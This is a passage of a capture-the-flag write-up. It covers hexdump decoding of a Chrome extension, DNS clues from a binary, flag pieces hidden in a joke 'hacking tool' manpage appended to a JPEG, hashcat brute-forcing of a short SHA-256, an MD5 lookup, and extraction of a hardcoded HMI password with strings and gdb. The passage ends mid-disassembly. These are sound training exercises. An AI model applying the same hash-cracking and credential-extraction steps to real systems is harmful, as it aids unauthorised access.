000003b0: fc15 2d93 343a 4d8a 1ed1 e9f7 14e2 4b84  ..-.4:M.......K.&#13;
000003c0: ad6f 5988 fa21 0d47 d735 4adc 5074 0036  .oY..!.G.5J.Pt.6&#13;
000003d0: ed86 54db b504 79d0 7aa5 220f 28fd 9e3d  ..T...y.z.&quot;.(..=&#13;
000003e0: 42a7 6fac 4eab 5527 73b5 89b1 4784 e9b5  B.o.N.U's...G...&#13;
000003f0: 4256 8ab0 f78d 396c 3875 9172 d76f d4cf  BV....9l8u.r.o..&#13;
00000400: 8e67 b7fd 3876 2764 57df 3f25 7978 cadf  .g..8v'dW.?%yx..&#13;
00000410: 8a94 cadb 65d6 f9c2 64d0 16a4 d1f6 a481  ....e...d.......&#13;
00000420: 235a 236a bf86 ba23 d485 6838 b71c a2e2  #Z#j...#..h8....&#13;
00000430: 30d8 777e 43a7 8727 7bca cf63 77c1 b6ac  0.w~C..'{..cw...&#13;
00000440: ae11 e7b8 6999 e522 86fc c9e4 16d5 5d15  ....i..&quot;......].&#13;
00000450: a9a8 f357 344c d168 19a5 d1ad 1b74 790b  ...W4L.h.....ty.&#13;
00000460: 0bea ad1c 1e1f 4445 d34d ca7a a068 f916  ......DE.M.z.h..&#13;
00000470: 7a26 4ea5 d47d 8fed 9b3a 6855 06e7 95ce  z&amp;amp;N..}...:hU....&#13;
00000480: 51c3 0895 4411 6baf a65d 2f9b 164e 9b8f  Q...D.k..]/..N..&#13;
00000490: 99ba 40a1 296c 3eb9 1ff7 b379 e31e 32d7  ..@.)l&amp;gt;....y..2.&#13;
000004a0: cee4 d08c 57d8 7910 8add 5011 3c8f f6d8  ....W.y...P.O...y....%q&#13;
00000580: 29bb 589e d34b eab6 efc8 2e1a a060 e339  ).X..K.......`.9&#13;
00000590: 6a62 d3d9 1bf6 04d5 3334 cafd 752e 89c1  jb......34..u...&#13;
000005a0: 573e 42de 04a1 db3c 9a36 650c 1f33 8ce9  W&amp;gt;B....a=&#13;
000007a0: a322 4612 3ca2 51d2 212a 25e0 7db6 f0c2  .&quot;F.&amp;lt;.Q.!*%.}...&#13;
000007b0: 7b18 4f62 9ce1 0922 05d9 3136 d9fb 02b9  {.Ob...&quot;..16....&#13;
000007c0: ef50 3d43 1243 699e 91aa 020a 3ac2 4651  .P=C.Ci.....:.FQ&#13;
000007d0: 1348 2848 2734 9422 64ce 15d5 b25f 12cf  .H(H'4.&quot;d...._..&#13;
000007e0: 5987 da63 0c3d 4311 c317 1702 6986 0ca2  Y..c.=C.....i...&#13;
000007f0: 81ca c488 7508 f0b9 32d0 911a e5a3 e874  ....u...2......t&#13;
00000800: c8b7 ecb4 4006 e783 a327 1d9a 18d2 3a5d  ....@....'....:]&#13;
00000810: 6aa1 3d6b 9f48 bc97 644f 6de0 9c27 532c  j.=k.H..dOm..'S,&#13;
00000820: a7aa 4415 00cb 98fe 5008 17a5 f9b5 d133  ..D.....P......3&#13;
00000830: 6a62 185d 2b78 6d2a 34c5 1913 3547 6a82  jb.]+xm*4...5Gj.&#13;
00000840: 456d 2bf2 43d5 0e3e 2907 2c22 9b33 f670  Em+.C..&amp;gt;).,&quot;.3.p&#13;
00000850: c6d8 e51a fbc9 0e7b 8621 46d4 2691 01ca  .......{.!F.&amp;amp;...&#13;
00000860: 4316 1dca f98a 24d0 b1e6 465b 342e 923d  C.....$...F[4..=&#13;
00000870: 810e 0cec 373b aad9 6111 f165 c953 5b6a  ....7;..a..e.S[j&#13;
00000880: c98d 40d2 3940 c81c 514b edc9 dd2a c3ca  ..@.9@..QK...*..&#13;
00000890: a6a1 8b23 1222 6905 de75 a711 beb2 375d  ...#.&quot;i..u....7]&#13;
000008a0: e773 cf68 8811 8cce a0eb 5421 19a9 90bc  .s.h......T!....&#13;
000008b0: 27f1 4111 32e8 00c3 6998 8d25 06fb 4199  '.A.2...i..%..A.&#13;
000008c0: 8a9e 63f6 6df6 a2c3 11a3 ae32 f921 6d77  ..c.m......2.!mw&#13;
000008d0: 3bf9 ff1b 78f6 77f4 0c4f 8c52 1119 4015  ;...x.w..O.R..@.&#13;
000008e0: 87e0 249a baa1 abcf 2bdb 67be c473 f290  ..$.....+.g..s..&#13;
000008f0: f257 bb5f 1978 e8de 0ff4 efb9 f14d a2c1  .W._.x.......M..&#13;
00000900: 52f7 0f50 4b03 0414 0000 0808 0040 9932  R..PK........@.2&#13;
00000910: 5020 17bf 2b8f 0000 00e4 0000 000a 0000  P ..+...........&#13;
00000920: 0070 6f70 7570 2e68 746d 6c75 8f41 0ec2  .popup.htmlu.A..&#13;
00000930: 300c 04ef bcc2 cd03 88b8 a791 1052 cf7c  0............R.|&#13;
00000940: 218d ad26 3434 51ea 22f5 f784 1a8e 9cbc  !..&amp;amp;44Q.&quot;.......&#13;
00000950: f2ee 8e65 d361 f6bc 1782 c0cf 644f 4606  ...e.a......dOF.&#13;
00000960: 8009 e4f0 239a e4c8 89ec 90dc 0443 5c90  ....#........C\.&#13;
00000970: 2a5c f1e5 164f 68b4 7892 5b7d 8d85 61ad  *\...Oh.x.[}..a.&#13;
00000980: be57 2597 ad9c 1fab b246 cbfe a0ea 1fd6  .W%......F......&#13;
00000990: 8c19 f76f 2f5c fec0 9b21 8971 63ce 0b44  ...o/\...!.qc..D&#13;
000009a0: ec95 0fe4 e7bb 9b48 d95b 8a7e 8640 953a  .......H.[.~.@.:&#13;
000009b0: a325 2247 84dd fac7 336f 504b 0304 1400  .%&quot;G....3oPK....&#13;
000009c0: 0008 0800 039c 3250 00f5 1da0 d500 0000  ......2P........&#13;
000009d0: 4c01 0000 0d00 0000 6d61 6e69 6665 7374  L.......manifest&#13;
000009e0: 2e6a 736f 6e45 8e4d 6bc4 2010 86ef f915  .jsonE.Mk. .....&#13;
000009f0: 83e7 45da 1e7b 2b85 40ef b995 1266 7592  ..E..{+.@....fu.&#13;
00000a00: 0ce8 286a b285 65ff 7bd5 14f6 e4c7 fbbc  ..(j..e.{.......&#13;
00000a10: 1ff7 0140 7914 5e28 97f9 a094 3988 7a87  ...@y.^(....9.z.&#13;
00000a20: b7cb d014 414f f5a5 4687 2b8c 2c96 127c  ....AO..F.+.,..|&#13;
00000a30: 1c28 86ac ba34 c052 3689 6339 5d6a da38  .(...4.R6.c9]j.8&#13;
00000a40: 03fd 1692 9603 3776 0e6c 0084 b2b1 ac1a  ......7v.l......&#13;
00000a50: be0a 5480 a502 962c 2c21 c1e7 3466 40b1  ..T....,,!..4f@.&#13;
00000a60: 4076 37d8 823a 6603 6590 d07d e0d1 b1e1  @v7..:f.e..}....&#13;
00000a70: b067 7db6 3e77 aa57 fda2 cead d714 6e99  .g}.&amp;gt;w.W......n.&#13;
00000a80: d28c e67f cdbd feb6 850b eeae cc6c 4e43  .............lNC&#13;
00000a90: 3b75 94b5 273d e518 e21e 9bde 2f7a 2bde  ;u..'=....../z+.&#13;
00000aa0: a90a 3c7a 5fa4 e439 b7ca 5c91 ef6e 6c35  ..&amp;lt;z_..9..\..nl5&#13;
00000ab0: 074d 786d 18fc 0c8f e10f 504b 0102 0000  .Mxm......PK....&#13;
00000ac0: 1400 0008 0800 0599 3250 8d9c a8ef ee03  ........2P......&#13;
00000ad0: 0000 e903 0000 0800 0000 0000 0000 0000  ................&#13;
00000ae0: 0000 0000 0000 0000 6963 6f6e 2e70 6e67  ........icon.png&#13;
00000af0: 504b 0102 0000 1400 0008 0800 779a 3250  PK..........w.2P&#13;
00000b00: 8bcd 4287 7802 0000 6404 0000 0800 0000  ..B.x...d.......&#13;
00000b10: 0000 0000 0100 0000 0000 1404 0000 706f  ..............po&#13;
00000b20: 7075 702e 6a73 504b 0102 0000 1400 0008  pup.jsPK........&#13;
00000b30: 0800 4099 3250 2017 bf2b 8f00 0000 e400  ..@.2P ..+......&#13;
00000b40: 0000 0a00 0000 0000 0000 0100 0000 0000  ................&#13;
00000b50: b206 0000 706f 7075 702e 6874 6d6c 504b  ....popup.htmlPK&#13;
00000b60: 0102 0000 1400 0008 0800 039c 3250 00f5  ............2P..&#13;
00000b70: 1da0 d500 0000 4c01 0000 0d00 0000 0000  ......L.........&#13;
00000b80: 0000 0100 0000 0000 6907 0000 6d61 6e69  ........i...mani&#13;
00000b90: 6665 7374 2e6a 736f 6e50 4b05 0600 0000  fest.jsonPK.....&#13;
00000ba0: 0004 0004 00df 0000 0069 0800 0000 00    .........i.....&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Putting this into a file and dumping it, gives us:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ xxd -r extension.hexdump &amp;gt; extension.raw&#13;
$ file extension.raw&#13;
extension.raw: Google Chrome extension, version 3&#13;
$ mkdir extension&#13;
$ cd extension/&#13;
$ unzip ../extension.raw&#13;
Archive:  ../extension.raw&#13;
warning [../extension.raw]:  593 extra bytes at beginning or within zipfile&#13;
  (attempting to process anyway)&#13;
  inflating: icon.png&#13;
  inflating: popup.js&#13;
  inflating: popup.html&#13;
  inflating: manifest.json&#13;
&amp;sect; ls&#13;
icon.png  manifest.json  popup.html  popup.js&#13;
$ cat popup.js&#13;
document.addEventListener('DOMContentLoaded', function() {&#13;
  var checkPageButton = document.getElementById('checkPage');&#13;
  checkPageButton.addEventListener('click', function() {&#13;
&#13;
    chrome.tabs.getSelected(null, function(tab) {&#13;
      d = document;&#13;
&#13;
      d.body.appendChild(&quot;00000000: 1f8b 0800 acbc 235e 0003 edcf 3d0a c230  ......#^....=..0&#13;
00000010: 18c6 f148 1717 bd81 1870 d049 9336 4d8e  ...H.....p.I.6M.&#13;
00000020: e10d 943a d441 bbf8 b1bb 7b03 a70e 1ec3  ...:.A....{.....&#13;
00000030: 450f e20d 9c5d 8d16 bb14 3a15 44f8 ff20  E....]....:.D..&#13;
00000040: bcbc c933 3c19 4f16 d6cc bf27 5d27 4bd1  ...3&amp;lt;.O....']'K.&#13;
00000050: 38a5 9435 46be a7b3 f167 aab0 d80b 712c  8..5F....g....q,&#13;
00000060: 7564 b572 910d 7d50 e9c8 6823 a46a be4a  ud.r..}P..h#.j.J&#13;
00000070: d57e bb4b 36be 4ab2 aacf f958 9ad6 bc17  .~.K6.J....X....&#13;
00000080: 3f91 e5fc 13fd 635b 9c2f 8399 081e d756  ?.....c[./.....V&#13;
00000090: c75f dcf2 e734 ebba bc4c 1c5c 70ba f786  ._...4...L.\p...&#13;
000000a0: 62f4 b38e 0000 0000 0000 0000 0000 0000  b...............&#13;
000000b0: 0080 aa17 cca3 969b 0028 0000            .........(..&#13;
&quot;);&#13;
    });&#13;
  }, false);&#13;
}, false);&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, again a hexdump, so put it in a file and convert it to raw again:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ xxd -r extension-js.hexdump &amp;gt; extension-js.raw&#13;
$ file extension-js.raw&#13;
extension-js.raw: gzip compressed data, last modified: Sun Jan 19 02:19:24 2020, from Unix, original size 10240&#13;
$ cp extension-js.raw extension-js.gz&#13;
$ ls&#13;
 extension           extension-js.gz        extension-js.raw   hitw_ch1_434MHz_1MSps.wav     extension.hexdump   extension-js.hexdump   extension.raw      master_preferences&#13;
$ gunzip --keep extension-js.gz&#13;
$ file extension-js&#13;
extension-js: POSIX tar archive&#13;
$ tar -tf extension-js&#13;
./b64_b64_b64_flag&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And that&amp;rsquo;s the flag \o/&lt;/p&gt;&#13;
&lt;h2 id=&quot;miscellaneous&quot;&gt;Miscellaneous&lt;/h2&gt;&#13;
&lt;p&gt;This part had three challenges, all of which were solved by us.&lt;/p&gt;&#13;
&lt;h3 id=&quot;just-run-with-steve-j.&quot;&gt;Just run with Steve J.&lt;/h3&gt;&#13;
&lt;p&gt;We&amp;rsquo;re given a file, its SHA1 hash, and the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Find the executable file attached and run it. No worries, it is not malware and it does NOT need to run with any privileges. Find out what it does and follow the clues.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;We were a bit conservative in that case and didn&amp;rsquo;t run the executable, so we did some static analysis instead:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file runme &#13;
runme: Mach-O 64-bit x86_64 executable, flags:&amp;lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&amp;gt;&#13;
$ strings runme&#13;
[snip]&#13;
@Hang on...&#13;
[redacted].firstchallenges.ninja&#13;
Did you catch that?&#13;
sleepForTimeInterval:&#13;
dataWithCapacity:&#13;
appendBytes:length:&#13;
@_DNSServiceProcessResult&#13;
@_DNSServiceQueryRecord&#13;
@_DNSServiceRefDeallocate&#13;
[snip]&#13;
_DNSServiceProcessResult&#13;
_DNSServiceQueryRecord&#13;
_DNSServiceRefDeallocate&#13;
[snip]&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, so we have a domain &lt;code&gt;[redacted].firstchallenges.ninja&lt;/code&gt; in there, as well as some references to DNS, so let&amp;rsquo;s see if anything turns up:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ dig [redacted].firstchallenges.ninja TXT&#13;
&#13;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.16.15-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; [redacted].firstchallenges.ninja TXT&#13;
;; global options: +cmd&#13;
;; Got answer:&#13;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Nice, that seems to have been a lucky one. The response looks like a hex string, so we decoded it:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ python3&#13;
Python 3.9.2 (default, Feb 28 2021, 17:03:44)&#13;
[GCC 10.2.1 20210110] on linux&#13;
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.&#13;
&amp;gt;&amp;gt;&amp;gt; import binascii&#13;
&amp;gt;&amp;gt;&amp;gt; binascii.unhexlify('5f6e635f7463705f323032312e66697273746368616c6c656e6765732e6e696e6a613a38343438')&#13;
b'_nc_tcp_[redacted].firstchallenges.ninja:8448'&#13;
&amp;gt;&amp;gt;&amp;gt;&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Another hint, so we do what we&amp;rsquo;re told to:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ nc [redacted].firstchallenges.ninja 8448&#13;
97ce8d01a9e01cef2b2a9b946c0051ff&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Trying to decode that value didn&amp;rsquo;t yield anything useful, so we submitted it as the flag &amp;ndash; which was correct :)&lt;/p&gt;&#13;
&lt;h3 id=&quot;my-man&quot;&gt;my man!&lt;/h3&gt;&#13;
&lt;p&gt;We receive a JPEG and very straightforward instructions:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;See if you can located all 7 pieces of the flag.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;After trying the obvious &amp;ndash; looking at the image itself and its exif data &amp;ndash; we looked at the file in a simple text editor and the last part of it seemed a bit odd:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ tail -n +75 myman.jpg&#13;
������[�H'��C#K_�k��0���]��c[O-�&quot;�.܇�c,��Ķ5��+⥺�5s�IGV�&amp;amp;v������B�?��V?�Q��Y=̶��?���_�=��O=�S*����*ƞ��u9%b4���h,m9����A�]:6(�O��rO�&amp;gt;'�H����fm;�0��@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A��.Dd June 21, 2020&#13;
.Dt MY &quot;&quot; !YouH&#13;
.Os&#13;
.Sh NAME&#13;
.Nm my&#13;
.Nd the ultimate hacking tool - its like Metasploit but for Ruby developers.&#13;
.Sh SYNOPSIS&#13;
.Nm my&#13;
.Op Fl lOfTheP&#13;
.Op Ar&#13;
.Sh DESCRIPTION&#13;
my is many tools in one. For each&#13;
.Ar file&#13;
provided to&#13;
.Nm my,&#13;
you can choose to exfiltrate, securely delete, or backdoor the&#13;
.Ar file.&#13;
.Nm my&#13;
is fully undetectable and is the hacking tool of choice for&#13;
Advanced and persistent APT threats.&#13;
.Pp&#13;
If no operands are given, my will dump credentials of all users on the system. If&#13;
.Nm my&#13;
is uploaded to a webserver, it can be used as a webshell or to conduct sql injection attacks.&#13;
.Pp&#13;
The following options are available:&#13;
.Bl -tag -width indent&#13;
.It Fl l&#13;
Hack the Gibson.&#13;
.It Fl O&#13;
output.&#13;
.It Fl f&#13;
iteratively inject json into the firewall (with force).&#13;
.It Fl T&#13;
modify authentication requests to the sqlite database's caching backend server's load balancer.&#13;
.It Fl h&#13;
dump credentials from the Sharepoint client's memory bank.&#13;
.It Fl e&#13;
crash the remotely executable's code path.&#13;
.It Fl P&#13;
double-click a JPEGs nested for loop recursion.&#13;
.Sh EXAMPLES&#13;
The following is how to do a&#13;
.Nm my&#13;
hack attack:&#13;
.Pp&#13;
.Dl &quot;my -Oh | my&quot;&#13;
.Sh DIAGNOSTICS&#13;
Nah.&#13;
.\&quot; sForThis&#13;
.Sh ENVIRONMENT&#13;
.Fn printf &quot;undAl&quot;&#13;
I am thankful manpage's markup language (groff/troff) never caught on outside of manpages.&#13;
.Sh COMPATIBILITY&#13;
The group field is now automatically included in YXZlRm8= the long listing for&#13;
files in order to be compatible with the&#13;
.St -p1003.2&#13;
specification.&#13;
.Sh SEE ALSO&#13;
https://pastebin.com/G5pbzCjR&#13;
.Sh LEGACY DESCRIPTION&#13;
All good men and women must take responsibility to create legacies that will take the next generation to a level we could only imagine.&#13;
.Sh HISTORY&#13;
An&#13;
.Nm my&#13;
command appeared in&#13;
.At v1 .&#13;
.Sh BUGS&#13;
my doesn't cotain any bugs because the authors conducted a ssae16 audit of the source.&#13;
.Hf /dev/null/ieces&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;For whatever reason, someone has appended some troff data to this image... Our solution was definitely not the most straightforward one, but we simply looked for stuff that looked &quot;odd&quot; and we knew that we&amp;rsquo;re looking for seven pieces. From top to bottom we identified:&lt;/p&gt;&#13;
&lt;ol type=&quot;1&quot;&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;!YouH&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;lOfTheP&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;sForThis&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;undAl&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;YXZlRm8=&lt;/code&gt; which is &lt;code&gt;aveFo&lt;/code&gt; after base64 decoding.&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;https://pastebin.com/G5pbzCjR&lt;/code&gt; a paste which contains &quot;Challenge!&quot;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;/dev/null/ieces&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ol&gt;&#13;
&lt;p&gt;Putting them all together in the right order results in &lt;code&gt;!YouHaveFoundAllOfThePiecesForThisChallenge!&lt;/code&gt; and that was the flag.&lt;/p&gt;&#13;
&lt;h3 id=&quot;the-bit-maker&quot;&gt;The Bit Maker&lt;/h3&gt;&#13;
&lt;p&gt;We got a commandlog from a compromised server and the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;You located a compromised system in your environment. After closer examination, you notice a keylogger installed on the system. A snippet of the keylog are attached. See if you can find the correct bits. The flag is hex values with no spaces or delimiters.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;The relevant part of the commandlog is:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ ls&#13;
&#13;
import random&#13;
&#13;
data = []&#13;
&#13;
for idx in xrange(random.randint(3000, 5000)):&#13;
  val = random.randint(0, 255)&#13;
  data.append(val)&#13;
&#13;
flag_len = 4&#13;
start = len(data) / 2&#13;
&#13;
with open(&quot;flag.txt&quot;, 'wb') as f:&#13;
  for i in range(start, start + flag_len):&#13;
    f.write(chr(data[i]))&#13;
    data[i] = 0x00&#13;
&#13;
with open(&quot;data.bin&quot;, 'wb') as f:&#13;
  f.write(''.join([chr(x) for x in data]))&#13;
&#13;
&#13;
$ shasum -a 256 ./*&#13;
22585d78ab9223ffca17d0d3cabd4265105f4efbbbb3ebfbbd7ab1b9b4a0dd98  ./data.bin&#13;
7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9  ./flag.txt&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;(yes, the output is a bit broken). So we know, our flag&amp;rsquo;s SHA256 hash and that it is 4 bytes. Time for hashcat:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;hashcat.bin -a 3 -m 1400 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9 '?b?b?b?b'&#13;
hashcat (v6.2.1) starting...&#13;
&#13;
* Device #1: WARNING! Kernel exec timeout is not disabled.&#13;
             This may cause &quot;CL_OUT_OF_RESOURCES&quot; or related errors.&#13;
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch&#13;
* Device #2: WARNING! Kernel exec timeout is not disabled.&#13;
             This may cause &quot;CL_OUT_OF_RESOURCES&quot; or related errors.&#13;
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch&#13;
nvmlDeviceGetFanSpeed(): Not Supported&#13;
&#13;
CUDA API (CUDA 11.2)&#13;
====================&#13;
* Device #1: GeForce RTX 2070, 7684/7973 MB, 36MCU&#13;
&#13;
OpenCL API (OpenCL 1.2 CUDA 11.2.162) - Platform #1 [NVIDIA Corporation]&#13;
========================================================================&#13;
* Device #2: GeForce RTX 2070, skipped&#13;
&#13;
Minimum password length supported by kernel: 0&#13;
Maximum password length supported by kernel: 256&#13;
&#13;
Hashes: 1 digests; 1 unique digests, 1 unique salts&#13;
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates&#13;
&#13;
Optimizers applied:&#13;
* Zero-Byte&#13;
* Early-Skip&#13;
* Not-Salted&#13;
* Not-Iterated&#13;
* Single-Hash&#13;
* Single-Salt&#13;
* Brute-Force&#13;
* Raw-Hash&#13;
&#13;
ATTENTION! Pure (unoptimized) backend kernels selected.&#13;
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.&#13;
If you want to switch to optimized backend kernels, append -O to your commandline.&#13;
See the above message to find out about the exact limits.&#13;
&#13;
Watchdog: Temperature abort trigger set to 90c&#13;
&#13;
Host memory required for this attack: 632 MB&#13;
&#13;
7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9:$HEX[42d14cad]&#13;
&#13;
Session..........: hashcat&#13;
Status...........: Cracked&#13;
Hash.Name........: SHA2-256&#13;
Hash.Target......: 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc...46f0d9&#13;
Time.Started.....: Thu Jun 10 09:12:07 2021 (1 sec)&#13;
Time.Estimated...: Thu Jun 10 09:12:08 2021 (0 secs)&#13;
Guess.Mask.......: ?b?b?b?b [4]&#13;
Guess.Queue......: 1/1 (100.00%)&#13;
Speed.#1.........:  2013.0 MH/s (6.57ms) @ Accel:4 Loops:128 Thr:1024 Vec:1&#13;
Recovered........: 1/1 (100.00%) Digests&#13;
Progress.........: 2925527040/4294967296 (68.12%)&#13;
Rejected.........: 0/2925527040 (0.00%)&#13;
Restore.Point....: 11354112/16777216 (67.68%)&#13;
Restore.Sub.#1...: Salt:0 Amplifier:0-128 Iteration:0-128&#13;
Candidates.#1....: $HEX[73612aac] -&amp;gt; $HEX[c0ff7faf]&#13;
Hardware.Mon.#1..: Temp: 57c Util: 86% Core:1770MHz Mem:5500MHz Bus:16&#13;
&#13;
Started: Thu Jun 10 09:12:06 2021&#13;
Stopped: Thu Jun 10 09:12:09 2021&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;So, in theory, we have our flag, i.e. &lt;code&gt;42d14cad&lt;/code&gt;. However, it wasn&amp;rsquo;t accepted and we wasted several tries to find out that we had to convert it to uppercase: The flag was 42D14CAD...&lt;/p&gt;&#13;
&lt;h2 id=&quot;cryptography-forensics&quot;&gt;Cryptography/Forensics&lt;/h2&gt;&#13;
&lt;p&gt;This section had only a single challenge.&lt;/p&gt;&#13;
&lt;h3 id=&quot;the-secret&quot;&gt;The Secret&lt;/h3&gt;&#13;
&lt;p&gt;Our task says:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;During a forensics investigation you find a piece of information that might help you learn the miscreant steps. The file is missing. You have only the following:&lt;/p&gt;&#13;
&lt;p&gt;&lt;code&gt;MD5 (mysecret.txt) = 52c76da7c56b606849df5a038d1bb561&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Just look it up in an MD5 database, e.g. &lt;a class=&quot;uri&quot; href=&quot;https://md5.gromweb.com/?md5=52c76da7c56b606849df5a038d1bb561&quot;&gt;https://md5.gromweb.com/?md5=52c76da7c56b606849df5a038d1bb561&lt;/a&gt; and the result is &lt;code&gt;admin123&lt;/code&gt;. The fun thing about that, however, was the fact that the MD5 sum is actually for &lt;code&gt;admin123&lt;/code&gt; + the appended newline, which led &lt;code&gt;hashcat&lt;/code&gt; and &lt;code&gt;john&lt;/code&gt; astray, as they remove newlines from entries in wordlists, it seems.&lt;/p&gt;&#13;
&lt;h2 id=&quot;ics&quot;&gt;ICS&lt;/h2&gt;&#13;
&lt;p&gt;This part had the most challenges, but we only solved four. We&amp;rsquo;re not sure how many it had in total, as we didn&amp;rsquo;t unlock some of the later ones.&lt;/p&gt;&#13;
&lt;p&gt;Additionally, one of our solves was a crossword puzzle which we won&amp;rsquo;t consider in this writeup.&lt;/p&gt;&#13;
&lt;h3 id=&quot;hmi-pwning---1&quot;&gt;HMI Pwning - 1&lt;/h3&gt;&#13;
&lt;p&gt;We were given a binary and the following instructions:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;These challenges involve reverse engineering and exploiting a custom HMI program.&lt;/p&gt;&#13;
&lt;p&gt;Can you determine the password that can be used to log in as the user &quot;engineer&quot;?&lt;/p&gt;&#13;
&lt;p&gt;Note: &lt;code&gt;hmi_coolant&lt;/code&gt; is a Linux binary that is safe to run on your local machine. Once running, you can communicate with your local instance of the HMI software via:&lt;/p&gt;&#13;
&lt;p&gt;&lt;code&gt;nc localhost 5050&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;For solving this challenge, it wasn&amp;rsquo;t 100% necessary to run the program:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ strings hmi_coolant&#13;
[snip]&#13;
 HMI Status:&#13;
  - Current User:       Engineer&#13;
  - Current User:       Administrator&#13;
  - Current User:       Guest&#13;
  - System Time:&#13;
  - System Version:&#13;
  - Uptime:             %d days %02d:%02d:%02ld&#13;
engineer&#13;
staplebatterycorrecthorse&#13;
administrator&#13;
[HMI] Available Commands:&#13;
[snip]&#13;
check_login&#13;
[snip]&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;It looks like &lt;code&gt;staplebatterycorrecthorse&lt;/code&gt; is the password we want. However, to be sure, we ran the binary using &lt;code&gt;gdb&lt;/code&gt; and looked at the &lt;code&gt;check_login&lt;/code&gt; function:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ gdb -q hmi_coolant&#13;
Reading symbols from hmi_coolant...(no debugging symbols found)...done.&#13;
(gdb) disass check_login&#13;
[snip]&#13;
   0x0000000000001def &amp;lt;+43&amp;gt;:    lea    0x1339(%rip),%rsi        # 0x312f&#13;
   0x0000000000001df6 &amp;lt;+50&amp;gt;:    mov    %rax,%rdi&#13;
   0x0000000000001df9 &amp;lt;+53&amp;gt;:    callq  0xe30 &amp;lt;strncasecmp@plt&amp;gt;&#13;
   0x0000000000001dfe &amp;lt;+58&amp;gt;:    test   %eax,%eax&#13;
